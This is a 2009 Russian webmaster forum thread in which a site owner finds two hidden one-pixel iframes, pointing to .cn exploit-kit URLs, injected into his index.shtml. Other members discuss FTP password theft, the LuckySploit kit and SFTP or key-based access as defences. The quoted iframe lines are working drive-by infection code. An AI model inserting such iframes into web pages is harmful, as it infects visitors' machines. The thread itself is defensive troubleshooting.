Master-X
Регистрация
|
Вход
Форум
|
Новости
|
Статьи
Главная
»
Форум
»
CJs
»
Тема:
Вопрос о index.shtml
Новая тема
Ответить
цитата
12/04/09 в 20:54
arte
доделывал топ, надо было добавить кое что в индекс.схтмл, и случайным образом наткнулся на строчку в коде
<iframe src="http://lotante.cn/in.cgi?income38" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://thelotbet.cn/in.cgi?income40" width=1 height=1 style="visibility: hidden"></iframe>
вопос: откуда она там могла взяться? права вроде настроены так что индекс могу менять только я... если ктонить встречался с этим помогите плиз!
цитата
12/04/09 в 20:59
Alexandur
Может пароль от ФТП свистнули. Сходи в венерологический.
цитата
12/04/09 в 21:34
WASP
Это вирус 100%. Мне такую же хрень на всех сайтах на одном хосте повесили, задолбался чистить
Антивир (нод не реагирует на него), загружает адоб ридер в процессы. Вопрос: как такое могли сделать? На сервере много доменов, каждый с разным фтп доступом.
цитата
12/04/09 в 21:45
Yacc
LuckySploit
цитата
12/04/09 в 22:41
rusawm
чекай свою систему локальную если на всех фтп аккаунтах так
цитата
13/04/09 в 01:23
nosf
Тоже самое было. Трояном вытянули пароль к фтп видимо.
Добрые люди посоветовали авиру(http://www.free-av.com/) и всё стало впорядке, как после нода нашёл 35 вирусов
Подумываю перейти на платную версию авиры
цитата
13/04/09 в 01:47
kit
Ставь SFTP и оставляй доступ только со своего IP.
И все проблемы исчезнут.
цитата
13/04/09 в 01:48
nosf
а если айпи динамический?)
цитата
13/04/09 в 02:58
Stup
WASP писал:
Это вирус 100%. Мне такую же хрень на всех сайтах на одном хосте повесили, задолбался чистить
Антивир (нод не реагирует на него), загружает адоб ридер в процессы. Вопрос: как такое могли сделать? На сервере много доменов, каждый с разным фтп доступом.
Делают обычно так - злоумышленник получает доступ к одному из фтп, заливает специальный пхп файл, запускает его через хттп, этот файл ищет и изменяет html файлы.
цитата
13/04/09 в 03:41
lega_cobra
nosferatu писал:
а если айпи динамический?)
Делай доступ по ключам, а не по логину/паролю. Ключ можешь в USB token засунуть в неэкспортируемом виде, тогда точно никто никогда не стырит...
цитата
13/04/09 в 04:10
Yacc
Сплоит относительно новый и в паблике его нет. Пока. )
Так что господа сиджеводы - готовьтесь.
Заражение происходит при посещении инфицированных страницы. Если при этом в браузере разрешено выполнение JScript и у вас есть права администратора, то вы попали. Однозначно.
И никакие антивирусы вас не спасут, так как это не просто "вирус" (если быть точным, то это вообще не вирус), а набор скриптов, эксплуатирующих различные актуальные уязвимости. И полагать, что после того как антивирус отрапортовал об удалении "вируса", вы чисты - просто наивно.
А если антивирус даже не среагировал и вы продолжали работать, то чего уж тогда удивлятся, что у вас утянули пароли.
Никакие баны по IP, как вы понимаете - не помогут, так как шелы заливаются с вашей машины.
Здесь список известных на сегодня атакующих серверов:
http://www.malwaredomainlist.com/mdl.php?inactive=&sort=Domain& amp;page=0
Хочу ещё раз подчеркнуть, что ни один антивирус не сможет полностью удалить такую заразу, если вы работали под учётной записью администратора. А большинство из них даже не среагирует.
цитата
13/04/09 в 05:55
Mad Knight
Yacc:
Ебать страху то нагнал, я чуть винчь не отформатировал
цитата
13/04/09 в 22:53
arte
Вчера почистил индекс, пока нормально, попозже посмотрим что будет.
На остальных доменах пока все спокойно...
цитата
14/04/09 в 00:14
lega_cobra
Просто любопытно, хоть один чел перейдёт на sftp/RSA-key вместо FTP/логин-пароль?
цитата
14/04/09 в 01:12
doomed
А что, кто-то еще использует ftp?
цитата
14/04/09 в 01:41
mickey
на вебазилле все отфильтровано слава богу по дефолту
цитата
14/04/09 в 01:44
Yacc
А что кто-то ещё не знает о существование приватных сборок фтп-грабберов стоимостью $5k?
цитата
14/04/09 в 01:58
mickey
кинь пару ссылок народу почитать, я тоже приватную сборку жигулей видел за двацатник
цитата
14/04/09 в 12:09
Teval
оффтопик: всё же хорошая вещь - форум
если вдруг постучится к тебе трейдер какой нить новый, пробиваешь его ник на форумах, читаешь посты и отказываешь в трейде, либо просто не отвечаешь
ЗЫ: я не о тс
цитата
14/04/09 в 12:22
mickey
нуда заранее себя документируют
цитата
14/04/09 в 16:56
color
gimcnuk писал:
Может пароль от ФТП свистнули. Сходи в венерологический.
скорее через скрипты поломали
цитата
22/04/09 в 21:50
dlk44
lega_cobra писал:
Просто любопытно, хоть один чел перейдёт на sftp/RSA-key вместо FTP/логин-пароль?
Нет.
цитата
22/04/09 в 21:53
dlk44
Stup писал:
Делают обычно так - злоумышленник получает доступ к одному из фтп, заливает специальный пхп файл, запускает его через хттп, этот файл ищет и изменяет html файлы.
Это если на сервере так настроены виртуальные хосты что через PHP можно зайти в чужую папку. А если все НОРМАЛЬНО как нада настроено - то получив доступ к одному FTP только с файлами на этом FTP можно и орудовать.
цитата
22/04/09 в 21:54
Woland
Цитата:
оффтопик: всё же хорошая вещь - форум
если вдруг постучится к тебе трейдер какой нить новый, пробиваешь его ник на форумах, читаешь посты и отказываешь в трейде, либо просто не отвечаешь
ЗЫ: я не о тс
Оффтопик:
Думаю "чё-то Teval молчит в аське на вопрос о трейде, с чего бы ... " а он, оказывается, посты перечитывает
цитата
23/04/09 в 01:06
color
dlk44 писал:
Нет.
почему нет? у нас процентов около 5 клиентов удалось перевести )) остальные не хотят )
Новая тема
Ответить
Эта страница в полной версии